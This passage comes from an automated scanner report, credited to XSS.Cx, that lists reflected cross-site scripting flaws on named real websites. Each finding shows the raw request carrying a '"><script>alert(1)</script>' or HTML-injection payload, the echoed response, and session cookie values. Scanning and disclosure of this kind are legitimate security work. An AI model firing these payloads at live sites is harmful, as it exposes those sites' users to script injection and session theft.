Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10809
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/backgroundsffa09"><script>alert(1)</script>3b65e62e778/headerBanner_new_user_home.png" />
...[SNIP]...

1.37. http://www.weseed.com/images/backgrounds/headerBanner_new_user_home.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/backgrounds/headerBanner_new_user_home.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7460"><script>alert(1)</script>fbb2ad121c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/backgrounds/headerBanner_new_user_home.pngf7460"><script>alert(1)</script>fbb2ad121c5 HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10809
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/backgrounds/headerBanner_new_user_home.pngf7460"><script>alert(1)</script>fbb2ad121c5" />
...[SNIP]...

1.38. http://www.weseed.com/images/icons/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/icons/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e772"><script>alert(1)</script>016122a1aef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4e772"><script>alert(1)</script>016122a1aef/icons/favicon.ico HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10759
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images4e772"><script>alert(1)</script>016122a1aef/icons/favicon.ico" />
...[SNIP]...

1.39. http://www.weseed.com/images/icons/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/icons/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abbf4"><script>alert(1)</script>75e2000d6cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/iconsabbf4"><script>alert(1)</script>75e2000d6cb/favicon.ico HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10759
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/iconsabbf4"><script>alert(1)</script>75e2000d6cb/favicon.ico" />
...[SNIP]...

1.40. http://www.weseed.com/images/icons/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/images/icons/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8179"><script>alert(1)</script>84f3e77de9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/favicon.icoa8179"><script>alert(1)</script>84f3e77de9d HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10759
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/images/icons/favicon.icoa8179"><script>alert(1)</script>84f3e77de9d" />
...[SNIP]...

1.41. http://www.weseed.com/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd1dd"><script>alert(1)</script>b28daab2977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loginbd1dd"><script>alert(1)</script>b28daab2977 HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10721
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/loginbd1dd"><script>alert(1)</script>b28daab2977" />
...[SNIP]...

1.42. http://www.weseed.com/portfolio [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weseed.com
Path:	/portfolio

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3210f"><script>alert(1)</script>96b5bf3bdb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portfolio3210f"><script>alert(1)</script>96b5bf3bdb0 HTTP/1.1
Host: www.weseed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.weseed.com/
Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Jan 2012 15:53:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: _ROR_session=7b6c4d7187a81d4e2a5da0245891d05f; path=/; HttpOnly
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
Content-Length: 10729
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.weseed.com/portfolio3210f"><script>alert(1)</script>96b5bf3bdb0" />
...[SNIP]...

1.43. http://theiia.org/1024/dsp_login2010.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://theiia.org
Path:	/1024/dsp_login2010.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd57e"><a>5cafd53c993 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /1024/dsp_login2010.cfm HTTP/1.1
Host: theiia.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=cd57e"><a>5cafd53c993
Cookie: JSESSIONID=9030e83ecd48d0e953b277640527212e5a73; CFID=22481576; CFTOKEN=69649930f84dace%2DB432922B%2DB8F0%2D650F%2DD6886FA23D2EC5B8; BNI__BARRACUDA_LB_COOKIE=4b05a8c000005000
Content-Length: 10

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Jan 2012 18:08:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=22481576;path=/
Set-Cookie: CFTOKEN=69649930f84dace%2DB432922B%2DB8F0%2D650F%2DD6886FA23D2EC5B8;path=/
Content-Type: text/html; charset=UTF-8
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=4b05a8c000005000; Path=/

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<style type="text/css">
* {
margin:0
...[SNIP]...
<input type="hidden" name="returnurl" value="http://www.google.com/search?hl=en&q=cd57e"><a>5cafd53c993" />
...[SNIP]...

1.44. http://www.theiia.org/1024/dsp_login2010.cfm [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.theiia.org
Path:	/1024/dsp_login2010.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14379"><a>ba267322b7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /1024/dsp_login2010.cfm HTTP/1.1
Host: www.theiia.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=14379"><a>ba267322b7f
Cookie: BNI__BARRACUDA_LB_COOKIE=5505a8c000005000; CFID=21910442; CFTOKEN=5c4bd3ccdf52102c%2DB433BB8B%2D155D%2D0F06%2D32DBB8D8871DFCA7; JSESSIONID=9030b24c754a4b431ba45693472b697a64d1
Content-Length: 10

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Jan 2012 18:09:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=21910442;path=/
Set-Cookie: CFTOKEN=5c4bd3ccdf52102c%2DB433BB8B%2D155D%2D0F06%2D32DBB8D8871DFCA7;path=/
Content-Type: text/html; charset=UTF-8
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=5505a8c000005000; Path=/

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<style type="text/css">
* {
margin:0
...[SNIP]...
<input type="hidden" name="returnurl" value="http://www.google.com/search?hl=en&q=14379"><a>ba267322b7f" />
...[SNIP]...

Report generated by XSS.Cx at Sat Jan 21 08:09:00 CST 2012.